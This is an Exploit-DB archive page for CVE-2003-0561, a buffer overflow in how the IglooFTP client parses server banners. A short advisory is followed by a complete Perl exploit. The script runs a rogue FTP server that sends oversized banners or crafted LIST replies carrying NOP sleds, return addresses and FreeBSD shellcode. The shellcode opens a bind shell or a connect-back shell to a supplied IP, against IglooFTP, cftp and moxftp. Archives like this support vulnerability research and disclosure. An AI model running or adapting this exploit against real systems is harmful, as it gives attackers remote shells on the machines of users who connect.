IglooFTP 0.6.1 - Banner Parsing Buffer Overflow

EDB-ID:

22891

CVE:

2003-0561

EDB Verified:

Author:

inv[at]dtors

Type:

remote

Exploit:   /  

Platform:

FreeBSD

Date:

2003-07-10

Vulnerable App: 
source: https://www.securityfocus.com/bid/8161/info

A buffer overflow vulnerability has been reported in IglooFTP. The vulnerability occurs when IglooFTP is parsing 'Welcome' banner messages from remote FTP servers. When IglooFTP receives an FTP banner exceeding a certain length, it will trigger the overflow condition. This could allow for execution of malicious code in the context of the FTP client.

#!/usr/bin/perl

# PoC exploit for iglooftp, cftp and moxftp for freebsd

# moxftp / mftp 2.2
# cftp 0.12
# Iglooftp 0.6.1

# Some of the code is fucked, the passive connection is a cheap hack and will not
# respawn, so the fake ftpd will have to be restarted... (only IglooFTP)
# Some RET adr's change, this can be fixed with gdb, look into it yourself..

# all the clients are from ports.. some may have been fixed, did this shit some 
# time ago..

# thanks to kokanin for help and advice
# code by inv[at]dtors

use IO::Socket;

sub convert_ret {
my($ret) = @_;
    
    for ($x=8; $x>0; $x=$x-2){
	$ret = substr($ret_temp,$x,2);
	$new_ret .= chr hex "$ret";
    }
return $new_ret;
}

sub convert_ip {
my($ip) = @_;

@ip_tmp = split(/\./, $ip);

for($x=0; $x<4; $x++) {
    $new_ip .= chr @ip_tmp[$x];
}
return $new_ip;
}

$server_port = 21;
$passive_server_port = 10324;

unless(@ARGV == 3 || @ARGV == 2) 
{ die 
"Usage ./DSR-ftp_clients.pl Shellcode Client Ip\n
\tShellcode:\t0 = Portbind
\t\t\t1 = Connect back\n
\tClient:\t\t0 = IglooFTP (FreeBSD 4.7)
\t\t\t1 = cftp (FreeBSD 4.7)
\t\t\t2 = Moxftp (FreeBSD 4.7)
\t\t\t3 = cftp (FreeBSD 5.0)
\t\t\t4 = IglooFTP (FreeBSD 5.0)
\t\t\t5 = Moxftp (FreeBSD 5.0)\n"
}

($shellcode_arg, $client_arg, $extra_arg) = @ARGV;

$user_ip = convert_ip($extra_arg);

@shellcode_list = (
    "Portbind,\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x52\x66\x68\x27\x10\x66\x51\x89\xe6\xb1\x10\x51\x56\x50\x50\xb0\x68\xcd\x80\x51\x53\x53\xb0\x6a\xcd\x80\x52\x52\x53\x53\xb0\x1e\xcd\x80\xb1\x03\x89\xc3\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80",
    "Connect Back,\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68"."$user_ip"."\x66\x68\x27\x10\x66\x51\x89\xe6\xb2\x10\x52\x56\x50\x50\xb0\x62\xcd\x80\x41\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80");

@client_list = (
    "IglooFTP - FreeBSD 4.7,188,0xbfbfc560,0",
    "cftp - FreeBSD 4.7,8192,0xbfbffb04,1,300",
    "mftp - FreeBSD 4.7,516,0xbfbff8e0,1,100",
    "cftp - FreeBSD 5.0,8196,0xbfbffa30,1,300",
    "IglooFTP - FreeBSD 5.0,212,0xbfbfc440,0",
    "mftp - FreeBSD 5.0,532,0xbfbff950,1,100");

@client_info = split(/,/,@client_list[$client_arg]);
@shellcode_info = split(/,/,@shellcode_list[$shellcode_arg]);

print "\tDSR-ftp_clients by inv\n
Setting up Service on Port: $server_port
Client: @client_info[0]
Using Shellcode: @shellcode_info[0]
Using Offset: @client_info[2]\n";

$shellcode = @shellcode_info[1];
$shellcode_length = length($shellcode);

$nop_count = @client_info[1] - $shellcode_length - 8;
$nops = "\x90"x$nop_count;

$ret_temp = @client_info[2];
$ret = substr($ret_temp,2,8);
$ret = convert_ret($ret);
$ret = "$ret"x2;

if(@client_info[3] eq "1") {
    $nops_x = "\x90"x@client_info[1];
    $nops_y = "\x90"x@client_info[4];
    $exploit_string = "$nops_x"."$ret"."$nops_y"."$shellcode";
}

if($client_arg == 0 or $client_arg == 4) {
	$exploit_string ="total 666
drwxr-xr-x	25 root wheel	1536 Jan 28 00:13 .
drwxr-xr-x	14 root wheel	 512 Jan 28 00:13 ..
-rwxr-xr-x	 2 inv	inv	 512 Jan 29 01:00 $nops$shellcode$ret";
}

$server = IO::Socket::INET->new(LocalPort => $server_port,
                                Type    => SOCK_STREAM,
                                Reuse   => 1,
                                Listen  => 10)
or die "Can't listen on $server_port : $!\n";

while ($client = $server->accept()) {
    
    if(@client_info[3] == 1) {
	print $client "220 $exploit_string\n";
    }
    
    if(@client_info[3] eq "0") {
	print $client "220 0xdeadcode\n";
	while($request !=~ /QUIT/i) {
	    $request = <$client>;
	    print $request;
	    
	    if($request =~ /PASS/i) {
		print $client "230 User anonymous logged in.\n";
	    }
	    
	    if($request =~ /USER/i) {
		print $client "331 Password required for anonymous.\n";
	    }
	
	    if($request =~ /SYST/i) {
		print $client "215 UNIX Type: L8\n";
	    }
	
	    if($request =~ /REST/i) {
		print $client "350 Restarting.\n";
	    }
	
	    if($request =~ /TYPE/i) {
		    print $client "200 Type set to A.\n";
	    }
	    
	    if($request =~ /PWD/i or $request =~ /FEAT/i) {
		print $client "257 \"/usr/home/inv/\" is current directory.\n";
	    }
	
	    if($request =~ /PASV/i) {
		$passive_server = IO::Socket::INET->new(LocalPort => $passive_server_port,
					Type 	=> SOCK_STREAM,
					Reuse 	=> 1,
					Listen 	=> 10)
		or die "Can't open passive port";
		print $client "227 Entering Passive Mode (127,0,0,1,40,84)\n";
	    }
	    
	    if ($request =~ /LIST/i) {
		while($passive_client = $passive_server->accept()){
		    print $client "150 Starting transfer.\n";    
		    print $passive_client $exploit_string;
		    close $passive_client;
		    print $client "226 BANG YOU ARE DEAD!!!\n";
		}
	    }	
	
	}
    close $client;
    }
}
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services